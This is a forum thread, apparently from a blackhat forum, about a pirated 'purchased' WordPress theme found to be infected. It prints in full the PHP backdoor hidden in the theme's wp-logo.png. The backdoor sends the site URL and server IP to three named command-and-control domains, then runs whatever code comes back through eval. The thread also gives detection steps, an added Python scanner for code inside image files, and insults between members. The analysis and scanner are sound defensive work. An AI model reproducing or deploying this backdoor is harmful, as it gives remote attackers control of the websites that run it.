Best Blackhat Forum

(06-17-2014 12:16 PM)iapetos Wrote: It is indeed infected, and poorly at that. Kids are just getting lazy now.
It's not infected, it's a purchased theme. TF authors started to use base64 in their themes and all this stuff.
try {
    // Three command-and-control hosts; one is picked at random and a random "apiN." label is prepended.
    $serverUrl = array(
        "96wn.com/transit.php",
        "64tj.com/transit.php",
        "ugo3.com/transit.php",
    );

    $domainPackVersion = 1;
    // Work out the infected server's IP, falling back to parsing ifconfig output.
    if(array_key_exists('SERVER_ADDR', $_SERVER))
        $ip = $_SERVER['SERVER_ADDR'];
    elseif(array_key_exists('LOCAL_ADDR', $_SERVER))
        $ip = $_SERVER['LOCAL_ADDR'];
    elseif(array_key_exists('SERVER_NAME', $_SERVER))
        $ip = gethostbyname($_SERVER['SERVER_NAME']);
    else {
        if(stristr(PHP_OS, 'WIN')) {
            $ip = gethostbyname(php_uname("n"));
        } else {
            $ifconfig = shell_exec('/sbin/ifconfig eth0');
            preg_match('/addr:([\d\.]+)/', $ifconfig, $match);
            $ip = $match[1];
        }
    }
    // Beacon payload: URL of the page being served, the server IP and the C2s that did not answer.
    $currentUrl = rtrim('http'.(empty($_SERVER['HTTPS'])?'':'s').'://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'], '/');
    $data = array(
        "url" => $currentUrl,
        "ip" => $ip,
        "domainPackVersion" => $domainPackVersion,
        "failedDomains" => array(),
    );
    $failedRequest = true;
    $failCounter = 0;
    $sockSuccess = false;
    $urlKey = rand(0, count($serverUrl)-1);
    $subDomain = rand(0, 10);
    while (!$sockSuccess) {
        $result = "";
        $url = parse_url("http://api".$subDomain.".".$serverUrl[$urlKey]);
        $host = $url["host"];
        $path = (!empty($url["path"])) ? $url["path"] : '';
        // Hand-rolled HTTP POST over a raw socket with a 1-second connect timeout (no curl, no allow_url_fopen needed).
        $fp = fsockopen($host, 80, $errno, $errstr, 1);
        $dataQuery=http_build_query($data);
        if($fp){
            fputs($fp, "POST $path HTTP/1.1".PHP_EOL);
            fputs($fp, "Host: $host".PHP_EOL);
            fputs($fp, "Content-type: application/x-www-form-urlencoded".PHP_EOL);
            fputs($fp, "Content-length: ".strlen($dataQuery).PHP_EOL);
            fputs($fp, "Connection: close".PHP_EOL.PHP_EOL);
            fputs($fp, $dataQuery);
            while(!feof($fp)) $result .= fgets($fp, 128);
            $code = substr($result,9,3); // status code out of "HTTP/1.1 200 OK"
            fclose($fp);
            if (is_numeric($code) && $code==="200") {
                break;
            }
        }
        // $failedRequest is never cleared, so a non-200 answer drops that C2 and retries at most once with another.
        if ($failedRequest) {
            $failCounter++;
            $data['failedDomains'][] = $serverUrl[$urlKey];
            array_splice($serverUrl,$urlKey, 1);
            if (!empty($serverUrl) && $failCounter<2)
            {
                $subDomain = rand(0, 10);
                $urlKey = rand(0, count($serverUrl)-1);
            }
            else
                break;
        }
    }
    // Whatever follows "result=" in the C2 response is executed as PHP: this is the backdoor itself.
    if (!empty($result) && strpos($result, 'result=')!==false)
    {
        $temp = explode('result=', $result, 2);
        if(isset($temp[1])){
            @eval($temp[1]);
        }
    }
} catch (Exception $e) {
    // Every error is swallowed so the infected page never shows a trace.
}

I really doubt Envato, who is out of Australia and never uses private whois, suddenly decided to insert this code with ties to a private registration out of Panama.
The function.php code, line 139:

if(get_option('wpb_js_templates',"")==""){
    // First run only: fetch the bundled demo templates, base64-decode and unserialize them into the option.
    $saved=wp_remote_get(get_template_directory_uri().'/admin/pages/saved.txt');
    $import_code = base64_decode($saved['body']);
    update_option( 'wpb_js_templates', unserialize($import_code), '', 'yes' );
}

It has base64_decode in it.
I also need some expert advice: is this safe?
Thanks
That function just imports the demo content. That part is ok. However the part I posted is an infection disguised as the wp-logo.png file.
Thanks iapetos for the advice.


VirusTotal scan shows 1 threat

https://www.virustotal.com/ro/file/ef130.../analysis/

Detection ratio: 1 / 53
Hope this helps other users.
Steps to detect:
open wp-logo.png with Notepad++
copy the entire code and paste it on http://ddecode.com/phpdecoder/
and you get the code as in post 12
iapetos
Conclusion: for sure it is not safe.
Someone please post a clean version, or do we just remove the image in the documentation, then it should be fine, correct???
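
A scanner for the check in the steps above, added here as an example and not code from the thread or the theme: it looks for PHP markers in files that claim to be images and peels base64 layers the way the ddecode step does by hand. The marker list, file names and the sample bytes (including the placeholder hostname) are assumptions.

```python
import base64
import re

# Magic bytes for the image formats a WordPress theme ships (constructed table).
IMAGE_MAGIC = {b"\x89PNG\r\n\x1a\n": "png", b"\xff\xd8\xff": "jpeg", b"GIF8": "gif"}
# Markers of the dropper pattern in this thread: PHP tags, eval, base64 layers, raw sockets.
MARKERS = [("<?php", rb"<\?php"), ("eval(", rb"\beval\s*\("), ("fsockopen(", rb"fsockopen\s*\("),
           ("base64_decode(", rb"base64_decode\s*\("), ("unserialize(", rb"\bunserialize\s*\(")]
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")

def image_kind(data: bytes):
    """Image type implied by the file header, or None if the bytes are not an image."""
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return None

def find_markers(data: bytes, depth: int = 3) -> set:
    """Marker names found in data, also decoding embedded base64 runs up to `depth` layers
    (roughly the step the thread does by hand on ddecode.com)."""
    hits = {name for name, pat in MARKERS if re.search(pat, data)}
    if depth > 0:
        for run in B64_RUN.findall(data):
            try:
                hits |= find_markers(base64.b64decode(run, validate=True), depth - 1)
            except ValueError:  # not real base64 (bad length or padding): skip this run
                continue
    return hits

def scan_file_bytes(name: str, data: bytes) -> dict:
    """Verdict for one theme file; an image carrying code markers is the wp-logo.png case."""
    kind, markers = image_kind(data), sorted(find_markers(data))
    verdict = "clean"
    if name.lower().endswith((".png", ".jpg", ".jpeg", ".gif")):
        if kind is None:
            verdict = "suspicious: image extension but no image header"
        if markers:
            verdict = "malicious: code markers inside an image file"
    elif markers:
        verdict = "review: code markers present, inspect by hand"
    return {"image": kind, "markers": markers, "verdict": verdict}

# Constructed sample shaped like the thread's wp-logo.png: PNG header, then PHP that evals a
# base64 layer hiding a socket beacon (hostname is a placeholder, not the thread's domains).
_INNER = base64.b64encode(b'<?php $fp = fsockopen("api3.c2-placeholder.invalid", 80); ?>')
SAMPLE_WP_LOGO = b"\x89PNG\r\n\x1a\n" + b"<?php @eval(base64_decode('" + _INNER + b"')); ?>"
CLEAN_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\rIHDR" + bytes(20)
```

Run scan_file_bytes(path, open(path, "rb").read()) over a theme's image files; a "malicious" verdict on wp-logo.png is exactly the case in this thread, and a "review" verdict on a .php file flags spots like the base64_decode in functions.php for a manual look.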

(06-17-2014 12:57 PM)fsnsh6 Wrote:
Just clean it and then post it!!!
Hope this helps other users.
Steps to detect:
open wp-logo.png with Notepad++
copy the entire code and paste it on http://ddecode.com/phpdecoder/
and you get the code as in post 12
iapetos
Conclusion: for sure it is not safe.
Sarena. How is this script purchased and infected at the same time? IF this is the case then you need your sorry *SS banned and kicked. So which is it?
Don't be rude. Not my purchase, I only posted what has been posted on a site. If it was my purchase I would say so. You can see all my other files I posted are all purchased by me. This was not mine, it was a unique theme and I posted it from a site.
IF you did not purchase it then it should NOT say....

[GET] ThemeForest - PRO Business - Responsive Multi-Purpose Theme [PURCHASED]

Implying that YOU purchased it, you lying piece of *hit! Don't say you purchased it and mislead members into thinking this is a legit post when your sorry lying a** knows good and well you infected it. *****. Take that shit somewhere else.